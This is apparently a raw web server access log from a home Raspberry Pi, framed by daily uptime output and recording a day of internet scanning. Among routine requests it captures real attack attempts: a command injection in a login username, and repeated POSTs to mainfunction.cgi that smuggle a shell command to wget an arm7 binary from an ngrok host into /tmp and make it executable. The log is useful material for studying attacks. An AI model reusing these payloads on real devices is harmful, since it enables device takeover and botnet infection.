Fri May 1 06:25:07 MDT 2020 06:25:07 up 66 days, 10:53, 1 user, load average: 0.36, 0.23, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 66days 1:22m 2.65s /usr/bin/lxsession -s LXDE-pi -e LXDE 31.47.103.74 - - [01/May/2020:12:31:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 177.152.159.33 - - [01/May/2020:13:17:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 162.243.145.56 - - [01/May/2020:15:46:38 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 114.33.90.248 - - [01/May/2020:16:04:30 +0000] "GET / HTTP/1.0" 200 25000 "" "" 196.52.43.124 - - [01/May/2020:16:10:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 176.37.44.31 - - [01/May/2020:16:49:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 160.179.121.171 - - [01/May/2020:18:20:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 83.34.162.179 - - [01/May/2020:18:26:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 81.214.223.209 - - [01/May/2020:18:40:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 93.46.241.37 - - [01/May/2020:19:19:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 93.46.241.37 - - [01/May/2020:19:19:45 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 83.97.20.21 - - [01/May/2020:19:40:52 +0000] "GET / HTTP/1.0" 200 25000 "" "" 189.209.135.214 - - [01/May/2020:20:16:42 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 189.209.135.214 - - [01/May/2020:20:16:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 189.209.135.214 - - [01/May/2020:20:16:48 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 189.209.135.214 - - [01/May/2020:20:16:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 144.217.207.17 - - [01/May/2020:20:51:13 +0000] "GET /Temporary_Listen_Addresses/SMSSERVICE HTTP/1.1" 404 0 "" "Wget/1.19.4 (linux-gnu)" 83.34.162.179 - - [01/May/2020:21:18:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 103.214.187.130 - - [01/May/2020:22:01:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 139.162.119.197 - - [01/May/2020:22:22:34 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 68.71.66.207 - - [01/May/2020:22:24:29 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 68.71.66.207 - - [01/May/2020:22:24:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 217.73.133.77 - - [01/May/2020:22:48:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 168.197.157.79 - - [01/May/2020:23:15:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.140.74 - - [01/May/2020:23:41:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 5.42.9.224 - - [02/May/2020:00:06:39 +0000] "GET / HTTP/1.1" 400 0 "" "" 114.35.75.217 - - [02/May/2020:00:17:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.206.226.16 - - [02/May/2020:00:46:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 151.127.20.47 - - [02/May/2020:00:52:32 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 109.232.2.118 - - [02/May/2020:02:04:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:01 +0000] "GET /home.asp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:02 +0000] "GET /login.cgi?uri= HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:02 +0000] "GET /vpn/index.html HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:03 +0000] "GET /cgi-bin/luci HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:04 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:04 +0000] "GET /remote/login?lang=en HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:05 +0000] "GET /index.asp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 109.232.2.118 - - [02/May/2020:02:04:05 +0000] "GET /htmlV/welcomeMain.htm HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 82.114.67.234 - - [02/May/2020:02:17:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 92.63.194.30 - - [02/May/2020:04:12:49 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.139.19.90 - - [02/May/2020:06:10:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.243.144.146 - - [02/May/2020:08:52:52 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 35.198.207.133 - - [02/May/2020:09:18:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" 191.243.1.96 - - [02/May/2020:09:25:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 138.99.216.171 - - [02/May/2020:09:43:46 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/75.0.3770.100 Safari/537.36" 80.82.68.16 - - [02/May/2020:09:53:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.16 - - [02/May/2020:09:53:24 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.16 - - [02/May/2020:09:53:24 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 45.195.146.140 - - [02/May/2020:10:48:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" 83.34.162.179 - - [02/May/2020:11:06:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 5.235.215.8 - - [02/May/2020:12:05:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" Sat May 2 06:25:07 MDT 2020 06:25:07 up 67 days, 10:53, 1 user, load average: 0.32, 0.27, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 67days 1:23m 2.65s /usr/bin/lxsession -s LXDE-pi -e LXDE